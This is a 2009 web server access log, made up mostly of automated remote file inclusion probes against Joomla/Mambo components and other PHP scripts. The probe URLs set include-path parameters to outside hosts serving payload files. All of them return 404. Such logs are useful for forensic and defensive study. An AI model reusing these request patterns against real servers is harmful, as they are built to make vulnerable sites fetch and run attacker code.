217.18.76.16 - - [14/May/2009:22:44:48 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:22:44:48 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:22:44:53 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:22:44:54 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
69.248.128.84 - - [14/May/2009:22:45:19 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
69.248.128.84 - - [14/May/2009:22:45:21 -0500] "GET //skin/zero_vote/error.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
87.106.135.14 - - [14/May/2009:22:45:35 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:22:45:35 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
69.172.92.14 - - [14/May/2009:22:45:48 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:22:45:49 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
69.90.72.88 - - [14/May/2009:22:45:56 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:22:45:56 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
116.50.163.164 - - [14/May/2009:22:46:39 -0500] "GET /logs/access_log.1236297600/index2.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:22:52:25 -0500] "GET /logs/access_log.1211846400 HTTP/1.1" 200 2440 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.248.128.84 - - [14/May/2009:22:52:34 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
69.248.128.84 - - [14/May/2009:22:52:34 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
217.18.76.16 - - [14/May/2009:22:52:54 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:22:52:55 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:22:54:18 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:22:54:18 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
195.137.160.90 - - [14/May/2009:22:55:49 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:22:55:49 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:22:55:49 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:22:57:05 -0500] "GET /logs/access_log.1171670400 HTTP/1.1" 200 6008 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.172.92.14 - - [14/May/2009:22:58:24 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:22:58:25 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
195.137.160.90 - - [14/May/2009:23:02:43 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:23:02:43 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:23:02:43 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:23:03:55 -0500] "GET /logs/index.php?visualizar=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:23:03:55 -0500] "GET /index.php?visualizar=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:23:04:47 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:23:04:47 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
221.157.225.65 - - [14/May/2009:23:04:50 -0500] "GET //login.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:23:04:50 -0500] "GET /logs//login.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:23:04:51 -0500] "GET /logs/access_log.1231718400//login.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:23:05:11 -0500] "GET /logs/main.php?pagina=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:23:05:11 -0500] "GET /main.php?pagina=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
221.157.225.65 - - [14/May/2009:23:05:35 -0500] "GET /logs/access_log.1233964800//login.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.227.63.136 - - [14/May/2009:23:06:50 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.227.63.136 - - [14/May/2009:23:06:56 -0500] "GET /logs/access_log.1235606400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
212.227.63.136 - - [14/May/2009:23:06:56 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.94.30.156 - - [14/May/2009:23:10:08 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:10:08 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:23:10:08 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:10:08 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:23:10:15 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
195.137.160.90 - - [14/May/2009:23:10:15 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:23:10:15 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:23:10:15 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
195.137.160.90 - - [14/May/2009:23:10:15 -0500] "GET /logs/access_log.1240099200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.94.30.156 - - [14/May/2009:23:10:15 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:23:11:11 -0500] "GET /logs/access_log.1112400000 HTTP/1.1" 200 344 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.90.72.88 - - [14/May/2009:23:11:15 -0500] "GET /logs/index2.php?content=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:23:11:16 -0500] "GET /index2.php?content=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
206.196.98.33 - - [14/May/2009:23:14:09 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
206.196.98.33 - - [14/May/2009:23:14:09 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
206.196.98.33 - - [14/May/2009:23:14:09 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
206.196.98.33 - - [14/May/2009:23:14:11 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
212.59.11.66 - - [14/May/2009:23:15:29 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:23:15:29 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:23:15:29 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:23:15:52 -0500] "GET /logs/access_log.1107216000 HTTP/1.1" 200 675 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.58.119.65 - - [14/May/2009:23:16:16 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:16:16 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.58.119.65 - - [14/May/2009:23:16:16 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.29.80.79 - - [14/May/2009:23:16:22 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.813"
72.29.80.79 - - [14/May/2009:23:16:22 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.813"
72.29.80.79 - - [14/May/2009:23:16:22 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.813"
72.29.80.79 - - [14/May/2009:23:16:24 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.813"
200.58.119.65 - - [14/May/2009:23:16:27 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/images/simplelists/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
84.33.1.7 - - [14/May/2009:23:16:54 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
84.33.1.7 - - [14/May/2009:23:16:55 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
84.33.1.7 - - [14/May/2009:23:16:55 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:23:16:55 -0500] "GET /logs/index.php?conteudo=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:23:16:55 -0500] "GET /index.php?conteudo=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
84.33.1.7 - - [14/May/2009:23:16:57 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:23:17:07 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:23:17:07 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:23:17:07 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:23:18:00 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:23:18:01 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:23:18:01 -0500] "GET /logs/access_log.1240099200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:23:18:01 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:23:18:12 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:23:18:12 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:23:18:12 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.172.92.14 - - [14/May/2009:23:19:00 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:23:19:00 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
122.153.212.195 - - [14/May/2009:23:19:23 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:23:19:23 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:23:19:23 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:23:19:23 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:23:19:23 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:23:19:26 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:23:19:28 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:23:19:29 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:23:19:29 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
122.153.212.195 - - [14/May/2009:23:19:31 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.43.5.67 - - [14/May/2009:23:19:32 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.43.5.67 - - [14/May/2009:23:19:32 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.43.5.67 - - [14/May/2009:23:19:32 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.43.5.67 - - [14/May/2009:23:19:32 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:23:19:55 -0500] "GET /logs/index.php?meio=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:23:19:55 -0500] "GET /index.php?meio=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:20:09 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:20:09 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
80.248.208.241 - - [14/May/2009:23:20:12 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
80.248.208.241 - - [14/May/2009:23:20:13 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
80.248.208.241 - - [14/May/2009:23:20:13 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
80.248.208.241 - - [14/May/2009:23:20:14 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://visper.ite.tul.cz/derf/vid.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:23:20:35 -0500] "GET /logs/access_log.1120521600 HTTP/1.1" 200 3206 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [14/May/2009:23:21:34 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:21:34 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
69.172.92.14 - - [14/May/2009:23:22:46 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:23:22:46 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
87.106.135.14 - - [14/May/2009:23:23:19 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:23:23:19 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.225.211.159 - - [14/May/2009:23:23:22 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:23:23:22 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:23:23:22 -0500] "GET /logs/access_log.1239926400//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.sysweb.it/user/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.172.92.14 - - [14/May/2009:23:24:45 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:23:24:45 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
217.18.76.16 - - [14/May/2009:23:25:12 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:23:25:12 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:23:25:15 -0500] "GET /logs/access_log.1177459200 HTTP/1.1" 200 1248 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [14/May/2009:23:25:56 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:23:25:56 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:23:25:56 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
